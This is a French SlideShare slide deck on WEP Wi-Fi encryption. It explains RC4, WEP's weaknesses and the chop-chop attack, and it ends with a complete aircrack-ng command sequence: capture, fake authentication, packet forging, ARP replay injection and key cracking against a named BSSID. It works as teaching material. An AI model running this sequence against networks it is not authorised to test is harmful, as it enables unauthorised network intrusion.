SlideShare une entreprise Scribd logo
1  sur  22
Clé WEP 
AFIFI FAISSAL
• Type de réseau 
– LAN (Local Area Network) 
– MAN (Metropolitan Area network) 
– WAN (Wide Area Network) 
• Qu’est ce qu’un réseau Wi-Fi? 
– Ondes radioélectriques 
– Standards 802.11
TCP/IP
WEP(Wired Equivalent Privacy) 
• Qu’est ce que le WEP? 
– Fait partie de la norme internationale IEEE 802.11 
– Une solution de confidentialité équivalente à un réseau 
filaire 
– Employé dans un WLAN pour : 
» La confidentialité 
» L’authentification 
» L’intégrité
WEP(Wired Equivalent Privacy) 
• Il est défini comme : 
– assez for: pour les clés longue (brute force) 
– à synchronisation automatique: les paquets sont autonomes 
– efficace : rapides (chiffrement et déchiffrement) 
– normalement exportable : longueur de clé variable 
– optionnel : l’utilisation du WEP est optionnel
Le chiffrement WEP 
• Il repose sur l’algorithme à clé symétrique RC4 
• Le chiffrement se décompose en plusieurs 
phases : 
– La création de la graine :IV+clé 
– La création du keystream 
– Le calcul ICV « Integrity Check Value » 
– La constitution du message final et son encapsulation dans 
une trame
L’algorithme RC4 dans WEP 
RC4 
– Symétrique 
– Chiffrement par flux 
– Différentes tailles de clé jusqu’à 256 bit 
– Il est extrêmement rapide 
Fonctionement 
• On génère un flux de données de taille identique au 
flux de données claires et on fait un XOR entre les 
deux
Initialisation de la clé 
• Deux longueurs de clé WEP 
– Clé (40 bits, soit 5 octets ) + IV = 64 bits 
– Clé (104 bits, soit 13 octets) + IV = 128 bits 
Graine 
IV : vecteur d’initialisation est une séquence de bits qui change régulièrement
Table «S» initialisée 
Mélange du tableau KSA 
pour i de 0 à 255 faire 
T[i]=i 
fin pour 
y ← 0 
pour x de 0 à 255 faire 
y ← y + T[x] + S[x] (modulo 256) 
T[x] ↔ T[y] 
fin pour
Pseudo Random Generator Algorithm PRGA 
PRGA(T) : 
x ← 0 
y ← 0 
x ← x+1 
y ← y+T[x] 
T[x] ↔ T[y] 
z ← T[x] + T[y] (modulo 256) 
renvoie T[z] 
Obtention du keystream =>
Opérations de chiffrement et de 
déchiffrement
LES FAILLES DU WEP 
• Social-Engineering 
• cryptanalyse
Les principales failles du WEP sont 
essentiellement les suivantes : 
• Les algorithmes de vérification d’intégrité et d’authentification 
sont très facilement contournables. 
• Possibilité de construire des dictionnaires fournissant en fonction 
d’un IV, le keystream. 
• L’algorithme de chiffrement RC4 présente des clés faibles et 
l’espace disponible pour les IV est trop petit. 
• 
• Une même clé est utilisée pour tout le réseau et les clés de 
chiffrement sont statiques . 
• Clés courtes 40 bits (5 caractères !!!) ou 104 bits et/ou trop 
simples (attaque par dictionnaire)
Les faiblesses du IV 
IV moins de 17 millions de combinaisons 
forte possibilité de Collisions 
Sniffer le réseau : ETHEREAL, WIRESHARK (la 
carte Wi-Fi en mode monitor)
Attaques contre le WEP 
L’attaque chop-chop 
• Le WEP utilise un contrôle de redondance cyclique ICV 
• Le CRC permet de s’assurer de l’intégrité des données mais en 
aucun cas de leur sécurité 
• L’attaque chop-chop va donc utiliser cette faiblesse pour 
injecter des paquets sur le réseau.
Trame1 Trame 2 
ajout 1 octet 
de données 
_____ DATA ___ ___ICV ___ 
D0 D1 D2 D3 D4 I3 I2 I1 I0 
+ + + + + + + + + 
K0 K1 K2 K3 K4 K5 K6 K7 K8 
= = = = = = = = = 
R0 R1 R2 R3 R4 R5 R6 R7 R8 
_____ DATA ____ ___ICV ___ 
D0 D1 D2 D3 D4 D5 J3 J2 J1 J0 
+ + + + + + + + + + 
K0 K1 K2 K3 K4 K5 K6 K7 K8 K9 
= = = = = = = = = = 
S0 S1 S2 S3 S4 S5 S6 S7 S8 S9 
Il est possible de passer du paquet 2 au paquet 1 en devinant la valeur de la 
somme I3+D5 (1 chance sur 256). On note X = I3 + D5.
Suite L’attaque chop-chop 
scan des réseaux wifi 
airodump-ng -w out -c 10 --encrypt wep --bssid 
00:16:41:C9:E0:3F wlan0 
on se fait passer pour un client: fake authentification 
aireplay-ng wlan0 -1 30 -e nom_wifi -a 00:16:41:C9:E0:3F 
-h 00:12:F0:6F:ED:38
L'attaque Chopchop 
aireplay-ng -4 wlan0 -a 00:16:41:C9:E0:3F -h 
00:12:F0:6F:ED:38 
=> resultat : 2 fichiers .cap et .xor 
Forger un paquet ARP avec Packetforge-ng 
packetforge-ng -0 -a 00:16:41:C9:E0:3F -h 
00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y 
.xor -w arp.cap
L'injection: Aireplay-ng -3, arp replay 
#aireplay-ng -3 -e nom_wifi -a 00:16:41:C9:E0:3F -h 
00:12:F0:6F:ED:38 -x600 -r arp.cap wlan0 
Le crack de la clé wep avec Aircrack-ng 
#aircrack-ng out-01.cap
Attaques contre RC4
Implementation

Contenu connexe

En vedette

Alphorm.com Support de la Formation Les Sciences Forensiques : L’investigati...
Alphorm.com Support de la Formation Les Sciences Forensiques  : L’investigati...Alphorm.com Support de la Formation Les Sciences Forensiques  : L’investigati...
Alphorm.com Support de la Formation Les Sciences Forensiques : L’investigati...Alphorm
 
Alphorm.com ressources-formation-hacking-et-securite-reseaux-sans-fils
Alphorm.com ressources-formation-hacking-et-securite-reseaux-sans-filsAlphorm.com ressources-formation-hacking-et-securite-reseaux-sans-fils
Alphorm.com ressources-formation-hacking-et-securite-reseaux-sans-filsAlphorm
 
Alphorm.com Support Formation Hacking & Sécurité Expert Vulnérabilités Web
Alphorm.com Support Formation Hacking & Sécurité Expert Vulnérabilités WebAlphorm.com Support Formation Hacking & Sécurité Expert Vulnérabilités Web
Alphorm.com Support Formation Hacking & Sécurité Expert Vulnérabilités WebAlphorm
 
Alphorm.com Support de la formation Hacking & Sécurité, Expert - Vulnérabilit...
Alphorm.com Support de la formation Hacking & Sécurité, Expert - Vulnérabilit...Alphorm.com Support de la formation Hacking & Sécurité, Expert - Vulnérabilit...
Alphorm.com Support de la formation Hacking & Sécurité, Expert - Vulnérabilit...Alphorm
 
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm
 
Alphorm.com Formation Cisco CCNP TSHOOT
Alphorm.com Formation Cisco CCNP TSHOOTAlphorm.com Formation Cisco CCNP TSHOOT
Alphorm.com Formation Cisco CCNP TSHOOTAlphorm
 
Alphorm.com Formation CEHV9 III
Alphorm.com Formation CEHV9 IIIAlphorm.com Formation CEHV9 III
Alphorm.com Formation CEHV9 IIIAlphorm
 
Un algorithme de chiffrement a flot base sur le probleme des 3 corps.
Un algorithme de chiffrement a flot base sur le probleme des 3 corps.Un algorithme de chiffrement a flot base sur le probleme des 3 corps.
Un algorithme de chiffrement a flot base sur le probleme des 3 corps.Samir Crypticus
 
Alphorm.com Formation Hacking et Sécurité , avancé
Alphorm.com Formation Hacking et Sécurité , avancéAlphorm.com Formation Hacking et Sécurité , avancé
Alphorm.com Formation Hacking et Sécurité , avancéAlphorm
 
Alphorm.com Formation CEHV9 II
Alphorm.com Formation CEHV9 IIAlphorm.com Formation CEHV9 II
Alphorm.com Formation CEHV9 IIAlphorm
 
Audit sécurité des systèmes d’information
Audit sécurité des systèmes d’informationAudit sécurité des systèmes d’information
Audit sécurité des systèmes d’informationAbbes Rharrab
 
Rapport de stage TOIP/VOIP
Rapport de stage TOIP/VOIPRapport de stage TOIP/VOIP
Rapport de stage TOIP/VOIPMounir Kaali
 
Typologie des réseaux informatiques
Typologie des réseaux informatiquesTypologie des réseaux informatiques
Typologie des réseaux informatiquesATPENSC-Group
 
alphorm.com - Formation Cisco ICND1-CCENT (100-101)
alphorm.com - Formation Cisco ICND1-CCENT (100-101)alphorm.com - Formation Cisco ICND1-CCENT (100-101)
alphorm.com - Formation Cisco ICND1-CCENT (100-101)Alphorm
 
Alphorm.com Formation Hacking et Sécurité, l'essentiel
Alphorm.com Formation Hacking et Sécurité, l'essentielAlphorm.com Formation Hacking et Sécurité, l'essentiel
Alphorm.com Formation Hacking et Sécurité, l'essentielAlphorm
 
HTML5 PushState
HTML5 PushStateHTML5 PushState
HTML5 PushStateFlorian L
 
Label de qualité "Écrit, illustré, imprimé au Québec"
Label de qualité "Écrit, illustré, imprimé au Québec"Label de qualité "Écrit, illustré, imprimé au Québec"
Label de qualité "Écrit, illustré, imprimé au Québec"AnnieBacon
 

En vedette (20)

Etude de la VoIP
Etude de la VoIPEtude de la VoIP
Etude de la VoIP
 
Alphorm.com Support de la Formation Les Sciences Forensiques : L’investigati...
Alphorm.com Support de la Formation Les Sciences Forensiques  : L’investigati...Alphorm.com Support de la Formation Les Sciences Forensiques  : L’investigati...
Alphorm.com Support de la Formation Les Sciences Forensiques : L’investigati...
 
Alphorm.com ressources-formation-hacking-et-securite-reseaux-sans-fils
Alphorm.com ressources-formation-hacking-et-securite-reseaux-sans-filsAlphorm.com ressources-formation-hacking-et-securite-reseaux-sans-fils
Alphorm.com ressources-formation-hacking-et-securite-reseaux-sans-fils
 
Alphorm.com Support Formation Hacking & Sécurité Expert Vulnérabilités Web
Alphorm.com Support Formation Hacking & Sécurité Expert Vulnérabilités WebAlphorm.com Support Formation Hacking & Sécurité Expert Vulnérabilités Web
Alphorm.com Support Formation Hacking & Sécurité Expert Vulnérabilités Web
 
Alphorm.com Support de la formation Hacking & Sécurité, Expert - Vulnérabilit...
Alphorm.com Support de la formation Hacking & Sécurité, Expert - Vulnérabilit...Alphorm.com Support de la formation Hacking & Sécurité, Expert - Vulnérabilit...
Alphorm.com Support de la formation Hacking & Sécurité, Expert - Vulnérabilit...
 
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
 
Alphorm.com Formation Cisco CCNP TSHOOT
Alphorm.com Formation Cisco CCNP TSHOOTAlphorm.com Formation Cisco CCNP TSHOOT
Alphorm.com Formation Cisco CCNP TSHOOT
 
Alphorm.com Formation CEHV9 III
Alphorm.com Formation CEHV9 IIIAlphorm.com Formation CEHV9 III
Alphorm.com Formation CEHV9 III
 
Un algorithme de chiffrement a flot base sur le probleme des 3 corps.
Un algorithme de chiffrement a flot base sur le probleme des 3 corps.Un algorithme de chiffrement a flot base sur le probleme des 3 corps.
Un algorithme de chiffrement a flot base sur le probleme des 3 corps.
 
Alphorm.com Formation Hacking et Sécurité , avancé
Alphorm.com Formation Hacking et Sécurité , avancéAlphorm.com Formation Hacking et Sécurité , avancé
Alphorm.com Formation Hacking et Sécurité , avancé
 
TELEPHONIE SUR IP
TELEPHONIE SUR IPTELEPHONIE SUR IP
TELEPHONIE SUR IP
 
Alphorm.com Formation CEHV9 II
Alphorm.com Formation CEHV9 IIAlphorm.com Formation CEHV9 II
Alphorm.com Formation CEHV9 II
 
Audit sécurité des systèmes d’information
Audit sécurité des systèmes d’informationAudit sécurité des systèmes d’information
Audit sécurité des systèmes d’information
 
Rapport de stage TOIP/VOIP
Rapport de stage TOIP/VOIPRapport de stage TOIP/VOIP
Rapport de stage TOIP/VOIP
 
Typologie des réseaux informatiques
Typologie des réseaux informatiquesTypologie des réseaux informatiques
Typologie des réseaux informatiques
 
alphorm.com - Formation Cisco ICND1-CCENT (100-101)
alphorm.com - Formation Cisco ICND1-CCENT (100-101)alphorm.com - Formation Cisco ICND1-CCENT (100-101)
alphorm.com - Formation Cisco ICND1-CCENT (100-101)
 
Alphorm.com Formation Hacking et Sécurité, l'essentiel
Alphorm.com Formation Hacking et Sécurité, l'essentielAlphorm.com Formation Hacking et Sécurité, l'essentiel
Alphorm.com Formation Hacking et Sécurité, l'essentiel
 
HTML5 PushState
HTML5 PushStateHTML5 PushState
HTML5 PushState
 
Label de qualité "Écrit, illustré, imprimé au Québec"
Label de qualité "Écrit, illustré, imprimé au Québec"Label de qualité "Écrit, illustré, imprimé au Québec"
Label de qualité "Écrit, illustré, imprimé au Québec"
 
Suave un toque
Suave un toqueSuave un toque
Suave un toque
 

Similaire à haking wep

Internet Procedure vesion 6 - IPV6 V4 - Computerland
Internet Procedure vesion 6 - IPV6 V4 - ComputerlandInternet Procedure vesion 6 - IPV6 V4 - Computerland
Internet Procedure vesion 6 - IPV6 V4 - ComputerlandPatricia NENZI
 
La sécurité des réseaux sans fil
La sécurité des réseaux sans filLa sécurité des réseaux sans fil
La sécurité des réseaux sans filsmiste
 
Chapitre 6 - Protocoles TCP/IP, UDP/IP
Chapitre 6  - Protocoles TCP/IP, UDP/IPChapitre 6  - Protocoles TCP/IP, UDP/IP
Chapitre 6 - Protocoles TCP/IP, UDP/IPTarik Zakaria Benmerar
 
Sécurité des réseaux sans fil WIFI
Sécurité des réseaux sans fil WIFISécurité des réseaux sans fil WIFI
Sécurité des réseaux sans fil WIFISoukaina Boujadi
 
S4 réseaux et internet
S4 réseaux et internet S4 réseaux et internet
S4 réseaux et internet mostafakhali
 
S4 réseaux et internet _
S4 réseaux et internet _S4 réseaux et internet _
S4 réseaux et internet _mostafakhali
 
IPv6 training
IPv6 trainingIPv6 training
IPv6 trainingFred Bovy
 
EIGRP - Authentification
EIGRP - Authentification EIGRP - Authentification
EIGRP - Authentification mdyabi
 
exercice_réseau
exercice_réseauexercice_réseau
exercice_réseaunoureddineb
 
Rétro-ingénierie de protocole crypto: Un "starter pack"
Rétro-ingénierie de protocole crypto: Un "starter pack"Rétro-ingénierie de protocole crypto: Un "starter pack"
Rétro-ingénierie de protocole crypto: Un "starter pack"Maxime Leblanc
 
Administration VMware esxi vsphere
Administration VMware esxi  vsphere Administration VMware esxi  vsphere
Administration VMware esxi vsphere tiandrazanalino
 
VPN site-to-site.pdf
VPN site-to-site.pdfVPN site-to-site.pdf
VPN site-to-site.pdfgorguindiaye
 
Adressage ip stl-cours
Adressage ip stl-coursAdressage ip stl-cours
Adressage ip stl-courssaqrjareh
 
Réseaux et protocoles - Cours + exercices
Réseaux et protocoles - Cours + exercices Réseaux et protocoles - Cours + exercices
Réseaux et protocoles - Cours + exercices sarah Benmerzouk
 

Similaire à haking wep (20)

securite.ppt
securite.pptsecurite.ppt
securite.ppt
 
BSidesQuebec2013-ssl
BSidesQuebec2013-sslBSidesQuebec2013-ssl
BSidesQuebec2013-ssl
 
Internet Procedure vesion 6 - IPV6 V4 - Computerland
Internet Procedure vesion 6 - IPV6 V4 - ComputerlandInternet Procedure vesion 6 - IPV6 V4 - Computerland
Internet Procedure vesion 6 - IPV6 V4 - Computerland
 
La sécurité des réseaux sans fil
La sécurité des réseaux sans filLa sécurité des réseaux sans fil
La sécurité des réseaux sans fil
 
Chapitre 6 - Protocoles TCP/IP, UDP/IP
Chapitre 6  - Protocoles TCP/IP, UDP/IPChapitre 6  - Protocoles TCP/IP, UDP/IP
Chapitre 6 - Protocoles TCP/IP, UDP/IP
 
Sécurité des réseaux sans fil WIFI
Sécurité des réseaux sans fil WIFISécurité des réseaux sans fil WIFI
Sécurité des réseaux sans fil WIFI
 
SDE 10 - Reseau
SDE 10 - ReseauSDE 10 - Reseau
SDE 10 - Reseau
 
SdE 11 - Reseau
SdE 11 - ReseauSdE 11 - Reseau
SdE 11 - Reseau
 
S4 réseaux et internet
S4 réseaux et internet S4 réseaux et internet
S4 réseaux et internet
 
S4 réseaux et internet _
S4 réseaux et internet _S4 réseaux et internet _
S4 réseaux et internet _
 
IPv6 training
IPv6 trainingIPv6 training
IPv6 training
 
EIGRP - Authentification
EIGRP - Authentification EIGRP - Authentification
EIGRP - Authentification
 
exercice_réseau
exercice_réseauexercice_réseau
exercice_réseau
 
Le chiffrement
Le chiffrementLe chiffrement
Le chiffrement
 
Chapitre 5 - couche réseaux
Chapitre 5 - couche réseauxChapitre 5 - couche réseaux
Chapitre 5 - couche réseaux
 
Rétro-ingénierie de protocole crypto: Un "starter pack"
Rétro-ingénierie de protocole crypto: Un "starter pack"Rétro-ingénierie de protocole crypto: Un "starter pack"
Rétro-ingénierie de protocole crypto: Un "starter pack"
 
Administration VMware esxi vsphere
Administration VMware esxi  vsphere Administration VMware esxi  vsphere
Administration VMware esxi vsphere
 
VPN site-to-site.pdf
VPN site-to-site.pdfVPN site-to-site.pdf
VPN site-to-site.pdf
 
Adressage ip stl-cours
Adressage ip stl-coursAdressage ip stl-cours
Adressage ip stl-cours
 
Réseaux et protocoles - Cours + exercices
Réseaux et protocoles - Cours + exercices Réseaux et protocoles - Cours + exercices
Réseaux et protocoles - Cours + exercices
 

haking wep

  • 1. Clé WEP AFIFI FAISSAL
  • 2. • Type de réseau – LAN (Local Area Network) – MAN (Metropolitan Area network) – WAN (Wide Area Network) • Qu’est ce qu’un réseau Wi-Fi? – Ondes radioélectriques – Standards 802.11
  • 4. WEP(Wired Equivalent Privacy) • Qu’est ce que le WEP? – Fait partie de la norme internationale IEEE 802.11 – Une solution de confidentialité équivalente à un réseau filaire – Employé dans un WLAN pour : » La confidentialité » L’authentification » L’intégrité
  • 5. WEP(Wired Equivalent Privacy) • Il est défini comme : – assez for: pour les clés longue (brute force) – à synchronisation automatique: les paquets sont autonomes – efficace : rapides (chiffrement et déchiffrement) – normalement exportable : longueur de clé variable – optionnel : l’utilisation du WEP est optionnel
  • 6. Le chiffrement WEP • Il repose sur l’algorithme à clé symétrique RC4 • Le chiffrement se décompose en plusieurs phases : – La création de la graine :IV+clé – La création du keystream – Le calcul ICV « Integrity Check Value » – La constitution du message final et son encapsulation dans une trame
  • 7. L’algorithme RC4 dans WEP RC4 – Symétrique – Chiffrement par flux – Différentes tailles de clé jusqu’à 256 bit – Il est extrêmement rapide Fonctionement • On génère un flux de données de taille identique au flux de données claires et on fait un XOR entre les deux
  • 8. Initialisation de la clé • Deux longueurs de clé WEP – Clé (40 bits, soit 5 octets ) + IV = 64 bits – Clé (104 bits, soit 13 octets) + IV = 128 bits Graine IV : vecteur d’initialisation est une séquence de bits qui change régulièrement
  • 9. Table «S» initialisée Mélange du tableau KSA pour i de 0 à 255 faire T[i]=i fin pour y ← 0 pour x de 0 à 255 faire y ← y + T[x] + S[x] (modulo 256) T[x] ↔ T[y] fin pour
  • 10. Pseudo Random Generator Algorithm PRGA PRGA(T) : x ← 0 y ← 0 x ← x+1 y ← y+T[x] T[x] ↔ T[y] z ← T[x] + T[y] (modulo 256) renvoie T[z] Obtention du keystream =>
  • 11.
  • 12. Opérations de chiffrement et de déchiffrement
  • 13. LES FAILLES DU WEP • Social-Engineering • cryptanalyse
  • 14. Les principales failles du WEP sont essentiellement les suivantes : • Les algorithmes de vérification d’intégrité et d’authentification sont très facilement contournables. • Possibilité de construire des dictionnaires fournissant en fonction d’un IV, le keystream. • L’algorithme de chiffrement RC4 présente des clés faibles et l’espace disponible pour les IV est trop petit. • • Une même clé est utilisée pour tout le réseau et les clés de chiffrement sont statiques . • Clés courtes 40 bits (5 caractères !!!) ou 104 bits et/ou trop simples (attaque par dictionnaire)
  • 15. Les faiblesses du IV IV moins de 17 millions de combinaisons forte possibilité de Collisions Sniffer le réseau : ETHEREAL, WIRESHARK (la carte Wi-Fi en mode monitor)
  • 16. Attaques contre le WEP L’attaque chop-chop • Le WEP utilise un contrôle de redondance cyclique ICV • Le CRC permet de s’assurer de l’intégrité des données mais en aucun cas de leur sécurité • L’attaque chop-chop va donc utiliser cette faiblesse pour injecter des paquets sur le réseau.
  • 17. Trame1 Trame 2 ajout 1 octet de données _____ DATA ___ ___ICV ___ D0 D1 D2 D3 D4 I3 I2 I1 I0 + + + + + + + + + K0 K1 K2 K3 K4 K5 K6 K7 K8 = = = = = = = = = R0 R1 R2 R3 R4 R5 R6 R7 R8 _____ DATA ____ ___ICV ___ D0 D1 D2 D3 D4 D5 J3 J2 J1 J0 + + + + + + + + + + K0 K1 K2 K3 K4 K5 K6 K7 K8 K9 = = = = = = = = = = S0 S1 S2 S3 S4 S5 S6 S7 S8 S9 Il est possible de passer du paquet 2 au paquet 1 en devinant la valeur de la somme I3+D5 (1 chance sur 256). On note X = I3 + D5.
  • 18. Suite L’attaque chop-chop scan des réseaux wifi airodump-ng -w out -c 10 --encrypt wep --bssid 00:16:41:C9:E0:3F wlan0 on se fait passer pour un client: fake authentification aireplay-ng wlan0 -1 30 -e nom_wifi -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38
  • 19. L'attaque Chopchop aireplay-ng -4 wlan0 -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 => resultat : 2 fichiers .cap et .xor Forger un paquet ARP avec Packetforge-ng packetforge-ng -0 -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y .xor -w arp.cap
  • 20. L'injection: Aireplay-ng -3, arp replay #aireplay-ng -3 -e nom_wifi -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 -x600 -r arp.cap wlan0 Le crack de la clé wep avec Aircrack-ng #aircrack-ng out-01.cap

Notes de l'éditeur

  1. Deux étapes sont nécessaires pour l’opération de chiffrement : • L’initialisation de la clé • La réalisation du cryptogramme (texte chiffré ou cyphertext)
  2. IV est de 24 bits, soit 224 valeurs possibles (transporter en claire ds les trames)
  3. Collision : avoir des trame chiffré avec la même clé , Facile à détecter vu que l’ IV circule en claire
  4. Le CRC permet de s’assurer de l’integrité des donnees mais en aucun cas de leur sécurité L’attaque chop-chop va donc utiliser cette faiblesse pou ´ r injecter des paquets sur le reseau.